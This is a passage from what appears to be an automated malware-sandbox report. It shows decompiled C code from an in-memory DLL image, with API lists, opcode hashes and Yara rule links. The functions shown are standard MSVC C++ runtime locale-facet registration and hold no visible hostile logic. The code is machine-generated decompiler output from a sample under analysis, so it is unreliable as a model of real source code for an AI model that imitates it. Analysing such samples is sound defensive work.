																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E1C6FD3(__eflags, _t352);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e286e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E1C6FD3(__eflags, _t351);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e286e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E1C6FD3(__eflags, _t350);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e286e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E1C6FD3(__eflags, _t349);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e286e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E1C6FD3(__eflags, _t348);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e286e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB753
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB75D
int.LIBCPMT ref: 6E1DB774

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1DB797
std::_Facet_Register.LIBCPMT ref: 6E1DB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB7EC

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: c7a90ee70c590c3df999522044849385d80d132a720487f776a8242ee80e3a4f
Instruction ID: 094176256fb9e451f98f329bf7a8ca4d108f437433029e7cc1779f044fd084af
Opcode Fuzzy Hash: c7a90ee70c590c3df999522044849385d80d132a720487f776a8242ee80e3a4f
Instruction Fuzzy Hash: 4811367691051C8BCF01EBE4C894EFEB77AAF54724F140908E411AB3D0DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t330 - 0x14, 0);
				_t315 =  *0x6e286e2c;
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1A161C(0x6e286e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E1C66BA(_t330 - 0x14);
					return E6E1E0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E1DBFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t330 - 0x20);
							E6E1E3D74(_t330 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t307, _t315, 0x14);
							E6E1C6653(_t330 - 0x14, 0);
							_t316 =  *0x6e286e30;
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1A161C(0x6e286e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E1C66BA(_t330 - 0x14);
								return E6E1E0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E1DC050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t330 - 0x20);
										E6E1E3D74(_t330 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t234, _t308, _t316, 0x14);
										E6E1C6653(_t330 - 0x14, 0);
										_t317 =  *0x6e286e34;
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1A161C(0x6e286e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E1C66BA(_t330 - 0x14);
											return E6E1E0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E1DC0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t330 - 0x20);
													E6E1E3D74(_t330 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t234, _t309, _t317, 0x14);
													E6E1C6653(_t330 - 0x14, 0);
													_t318 =  *0x6e286e3c;
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1A161C(0x6e286e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E1C66BA(_t330 - 0x14);
														return E6E1E0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E1DC120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t330 - 0x20);
																E6E1E3D74(_t330 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t234, _t310, _t318, 0x14);
																E6E1C6653(_t330 - 0x14, 0);
																_t319 =  *0x6e286e38;
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1A161C(0x6e286e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E1C66BA(_t330 - 0x14);
																	return E6E1E0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E1DC1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t330 - 0x20);
																			E6E1E3D74(_t330 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t234, _t311, _t319, 0x14);
																			E6E1C6653(_t330 - 0x14, 0);
																			_t320 =  *0x6e286e40;
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1A161C(0x6e286e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E1C66BA(_t330 - 0x14);
																				return E6E1E0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E1DC229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t330 - 0x20);
																						E6E1E3D74(_t330 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t234, _t312, _t320, 0x14);
																						E6E1C6653(_t330 - 0x14, 0);
																						_t321 =  *0x6e286e44;
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1A161C(0x6e286e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E1C66BA(_t330 - 0x14);
																							return E6E1E0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E1DC295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1A1438(_t283);
																									E6E1E3D74(_t330 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e22851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e22c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E1DD028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E1E0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E1C6FD3(__eflags, _t313);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e286e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E1C6FD3(__eflags, _t312);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e286e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E1C6FD3(__eflags, _t311);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e286e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E1C6FD3(__eflags, _t310);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e286e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E1C6FD3(__eflags, _t309);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e286e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E1C6FD3(__eflags, _t308);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e286e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E1C6FD3(__eflags, _t307);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e286e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB803
int.LIBCPMT ref: 6E1DB81A

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1DB83D
std::_Facet_Register.LIBCPMT ref: 6E1DB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB892

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 15d683e6d4bd3aa714ecd9dc39d1a8cfba48214f0a848bc4e53f7cc1a5696345
Instruction ID: b9292da3e312ab8f224c9e62ff43f6fd2e43426f7e32534bb53cdd8050cbbcab
Opcode Fuzzy Hash: 15d683e6d4bd3aa714ecd9dc39d1a8cfba48214f0a848bc4e53f7cc1a5696345
Instruction Fuzzy Hash: 1A1123759105188BCF01EBE4C854EFEB77ABF54B04F140908E421A7290DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t550 - 0x14, 0);
				_t525 =  *0x6e286df8;
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1A161C(0x6e286da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E1C66BA(_t550 - 0x14);
					return E6E1E0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E1D1127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t550 - 0x20);
							E6E1E3D74(_t550 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t512, _t525, 0x14);
							E6E1C6653(_t550 - 0x14, 0);
							_t526 =  *0x6e286df4;
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1A161C(0x6e286da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E1C66BA(_t550 - 0x14);
								return E6E1E0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E1D11AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t550 - 0x20);
										E6E1E3D74(_t550 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t389, _t513, _t526, 0x14);
										E6E1C6653(_t550 - 0x14, 0);
										_t527 =  *0x6e286dc8;
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1A161C(0x6e286d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E1C66BA(_t550 - 0x14);
											return E6E1E0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E1D1230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t550 - 0x20);
													E6E1E3D74(_t550 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t389, _t514, _t527, 0x14);
													E6E1C6653(_t550 - 0x14, 0);
													_t528 =  *0x6e286dc4;
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1A161C(0x6e286d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E1C66BA(_t550 - 0x14);
														return E6E1E0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E1D12B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t550 - 0x20);
																E6E1E3D74(_t550 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t389, _t515, _t528, 0x14);
																E6E1C6653(_t550 - 0x14, 0);
																_t529 =  *0x6e286dd8;
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1A161C(0x6e286d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E1C66BA(_t550 - 0x14);
																	return E6E1E0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E1D1339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t550 - 0x20);
																			E6E1E3D74(_t550 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t389, _t516, _t529, 0x14);
																			E6E1C6653(_t550 - 0x14, 0);
																			_t530 =  *0x6e286db0;
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1A161C(0x6e286d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E1C66BA(_t550 - 0x14);
																				return E6E1E0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E1D13A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t550 - 0x20);
																						E6E1E3D74(_t550 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t389, _t517, _t530, 0x14);
																						E6E1C6653(_t550 - 0x14, 0);
																						_t531 =  *0x6e286ddc;
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1A161C(0x6e286d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E1C66BA(_t550 - 0x14);
																							return E6E1E0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E1D1409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t550 - 0x20);
																									E6E1E3D74(_t550 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t389, _t518, _t531, 0x14);
																									E6E1C6653(_t550 - 0x14, 0);
																									_t532 =  *0x6e286de0;
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1A161C(0x6e286d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E1C66BA(_t550 - 0x14);
																										return E6E1E0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E1D1471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t550 - 0x20);
																												E6E1E3D74(_t550 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t389, _t519, _t532, 0x14);
																												E6E1C6653(_t550 - 0x14, 0);
																												_t533 =  *0x6e286dfc;
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1A161C(0x6e286da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E1C66BA(_t550 - 0x14);
																													return E6E1E0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E1D14EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t550 - 0x20);
																															E6E1E3D74(_t550 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t389, _t520, _t533, 0x14);
																															E6E1C6653(_t550 - 0x14, 0);
																															_t534 =  *0x6e286dcc;
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1A161C(0x6e286d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E1C66BA(_t550 - 0x14);
																																return E6E1E0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E1D1558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t550 - 0x20);
																																		E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t389, _t521, _t534, 0x14);
																																		E6E1C6653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e286e00;
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1A161C(0x6e286dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E1C66BA(_t550 - 0x14);
																																			return E6E1E0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E1D15C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t550 - 0x20);
																																					E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t389, _t522, _t535, 0x14);
																																					E6E1C6653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e286dd0;
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1A161C(0x6e286d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E1C66BA(_t550 - 0x14);
																																						return E6E1E0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E1D162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1A1438(_t473);
																																								E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e22851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e22c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E1D542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E1E0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t523);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e286dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t522);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e286e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
